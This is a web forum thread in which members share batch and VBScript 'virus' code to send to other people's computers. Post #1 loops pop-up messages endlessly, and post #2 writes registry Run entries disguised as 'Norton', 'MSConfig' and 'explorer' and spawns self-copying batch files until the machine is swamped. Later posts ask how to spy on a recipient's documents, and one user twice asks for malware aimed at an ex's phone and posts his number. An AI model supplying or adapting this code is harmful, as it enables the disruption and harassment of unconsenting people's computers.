Go Back   TechArena Community > Software > Tips & Tweaks
Become a Member!
Forgot your username/password?
Register Tags Active Topics RSS Search Mark Forums Read SiteMap

Tags: , , , , ,

Sponsored Links



How to create a simple virus

Tips & Tweaks


Closed Thread
 
Thread Tools Search this Thread
  #1  
Old 23-04-2009
manishdk's Avatar
Member
 
Join Date: Jul 2004
Posts: 102
How to create a simple virus

Here is a way on how to create a simple batch file virus

Write it in a notepad
Cycle a message in your friend's computer(code is given below)
Type :
Code:
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save it as "Anything.BAT" and send it.
  #2  
Old 23-04-2009
Member
 
Join Date: Aug 2005
Posts: 292
Re: How to create a simple virus

Here's another simple batch file virus
It creates a reg file and puts it in the registry
then it creates a file in C:\ called 2.bat
the 2.bat file copys itself into other files and opens them
each file does the same 2.bat but they EACH loop
so it keeps on opening other batches that each loop and open other batches
the only way out is to boot in safe mode.
I tried this one a couple comps and on one of them it wasnt very effective and it only opened a limited amount of files and im not sure why because i was able to crt+alt+del which i wasnt able to do on the other comps which were all winblows xp. there will be 1600 processes opening about 1600 other processes opening up another 1600 processes and so on looping on each of them

@echo off
del C:\1.reg
>>"C:\1.reg" ECHO winblows Registry Editor Version 5.00
>>"C:\1.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\winblows\CurrentVersion\Run]
>>"C:\1.reg" ECHO "MSConfig"="C:\\1.bat "
>>"C:\1.reg" ECHO "MCUpdateExe"="c:\\2.bat"
>>"C:\1.reg" ECHO "explorer"="c:\\3.bat"
>>"C:\1.reg" ECHO "Norton"="c:\\winblows\\1.bat"
>>"C:\1.reg" ECHO "System"="c:\\winblows\\2.bat"
>>"C:\1.reg" ECHO "autoexec"="c:\\winblows\\3.bat"
regedit.exe /s C:\1.reg

>>"C:\2.bat" ECHO :1
>>"C:\2.bat" ECHO copy 2.bat C:\3.bat
>>"C:\2.bat" ECHO copy 2.bat C:\4.bat
>>"C:\2.bat" ECHO copy 2.bat C:\5.bat
>>"C:\2.bat" ECHO start C:\2.bat
>>"C:\2.bat" ECHO start C:\3.bat
>>"C:\2.bat" ECHO start C:\4.bat
>>"C:\2.bat" ECHO start C:\5.bat
>>"C:\2.bat" ECHO copy C:\2.bat C:\winblows\1.bat
>>"C:\2.bat" ECHO copy C:\3.bat C:\winblows\2.bat
>>"C:\2.bat" ECHO copy C:\4.bat C:\winblows\3.bat
>>"C:\2.bat" ECHO start C:\winblows\1.bat
>>"C:\2.bat" ECHO start C:\winblows\2.bat
>>"C:\2.bat" ECHO start C:\winblows\3.bat
>>"C:\2.bat" ECHO goto 1

start 2.bat
del C:\1.reg
  #3  
Old 09-07-2009
Member
 
Join Date: Jul 2009
Posts: 1
Re: How to create a simple virus

Hi! im just new here. ive tried the batch file, that manishdk made, in my own computer. i just became curious about the output of that virus so ive tried it. it is an infinite message of those msg indicated and ive tried to close it using the task manager but it doesnt respond. i boot my pc and it was gone. is there a way that i can close that application by not rebooting my pc?
  #4  
Old 15-07-2009
Member
 
Join Date: Jan 2009
Posts: 1,741
Re: How to create a simple virus

There is no other way to close the infinite loop. You cannot even end the process from task manager as windows won't allow you to terminate 'csrss' that is generating the message. Reboot is the only way...
  #5  
Old 08-08-2009
Member
 
Join Date: Aug 2009
Posts: 2
ThumbsUp Re: How to create a simple virus

I Can Still Quit through the cmd is ther a way to fix that and btw thnx for the help even though its not meant to be done XD
  #6  
Old 08-08-2009
Member
 
Join Date: Aug 2009
Posts: 2
Re: How to create a simple virus

Thankyou Jackalz for ur info on ther copying but does any1 no how to make this continue without deleteing the regs plz
  #7  
Old 09-07-2010
Member
 
Join Date: Jul 2010
Posts: 1
Re: How to create a simple virus

once i send this to an email address how do i see his documents on his computer??
  #8  
Old 10-07-2010
Itronix's Avatar
Member
 
Join Date: Apr 2008
Posts: 419
Re: How to create a simple virus

Usually it is not ethical to create a virus and then sending that to anyone pc. It is illegal and you must not discuss the same. But if you are interested to become a Expert in tracing such things then you can go for classes of Ethical hacking. This will provide you much higher knowledge on the same. This small things are easily detected by an antivirus program.
  #9  
Old 10-07-2010
Member
 
Join Date: Jun 2010
Location: Kolkata
Posts: 248
Re: How to create a simple virus

i have created one using C++ coding, its a real application virus. cannot be detected, very deadly. and hence i wont put the code over here. i used winrar too in the making process.
  #10  
Old 13-07-2010
Member
 
Join Date: Jun 2010
Location: Kolkata
Posts: 248
Re: How to create a simple virus

nope, strictly classified
actually i kinda manupulated it and use it to catch and kill viruses in safe mode.

i'll give you a hint...
its simple and has 3 lines in it
  #11  
Old 25-08-2010
Member
 
Join Date: Aug 2010
Posts: 2
Re: How to create a simple virus

Can someone help me out please, i want to creat a picture virus that can be transfered to a USB drives devices when connected to a computer. so as to advertise my photo.
  #12  
Old 25-08-2010
Expertz's Avatar
Member
 
Join Date: Dec 2007
Posts: 1,432
Re: How to create a simple virus

An Image viruse or picture virus cannot cause any damage to a computer by themselves. Instead the code they contain exploits problems in other programs. For example, the code to draw images in the Microsoft Windows operating system was found to have a flaw. This flaw allowed images to access parts of the system that they would not normally be allowed to access. An infected image, transferred to your computer on a web page, in a document or in a chat window could access your system and plant a virus.
  #13  
Old 07-11-2010
Member
 
Join Date: Nov 2010
Posts: 2
Re: How to create a simple virus

can someone please send a virus to 13477067944 ? My ex has vital information on his phone which needs to be destroyed. Please help me out you guys! Thank you
  #14  
Old 09-11-2010
Suzane's Avatar
Member
 
Join Date: Apr 2009
Posts: 69
Re: How to create a simple virus

Yes it is true when .Bat is good but .Vbs c fun too I think. Some "source codes?"
Code:
Set variable = CreateObject ("WScript.Shell") 
variable.Run ("C: \ WINDOWS \ System32 \ notepad.exe") 
WScript.Sleep 1000 
variable.SendKeys (B) 
variable.Run ("C: \ WINDOWS \ System32 \ notepad.exe") 
WScript.Sleep 100 
variable.SendKeys (Y) 
variable.Run ("C: \ WINDOWS \ System32 \ notepad.exe") 
WScript.Sleep 100 
variable.SendKeys ("E") 
variable.Run ("C: \ WINDOWS \ System32 \ notepad.exe") 
WScript.Sleep 100 
variable.SendKeys ("!")
Then I explain that to the almost similar. Finally beats like C = x. Notepad -> the "source code", closed, registered office (well for me), rename file.vbs, I do not advise opening it later.
  #15  
Old 09-11-2010
Member
 
Join Date: Nov 2010
Posts: 2
Re: How to create a simple virus

can someone please send a virus as a mms to my ex's phone? I am no longer with him, he is dumb enough to open anything, and I need to have all of my information wiped out from his phone. His number is 13477067944..... please help me out you guys. I am computer illiterate, and while I am not even seeking revenge against him for what he has done to me and my family, I just want to rest assured that he wont use what he has against me at all. I appreciate it so much!
Closed Thread

  TechArena Community > Software > Tips & Tweaks


Thread Tools Search this Thread
Search this Thread:

Advanced Search


Similar Threads for: "How to create a simple virus"
Thread Thread Starter Forum Replies Last Post
how to create a simple student profile in java bluestar_me Software Development 2 3 Weeks Ago 01:59 PM
How to create a simple logo in Illustrator Tool L 4 Life Windows Software 4 17-01-2011 08:01 AM
How to create video as well as what software is simple to utilize chyarte Windows Software 3 15-01-2011 07:23 PM
How to create Login System for Simple Website StudyBoy Software Development 5 27-07-2010 06:10 PM
How to create simple Chat page using PHP Guns-n-Roses Software Development 3 10-09-2009 03:11 PM


All times are GMT +5.5. The time now is 06:33 AM.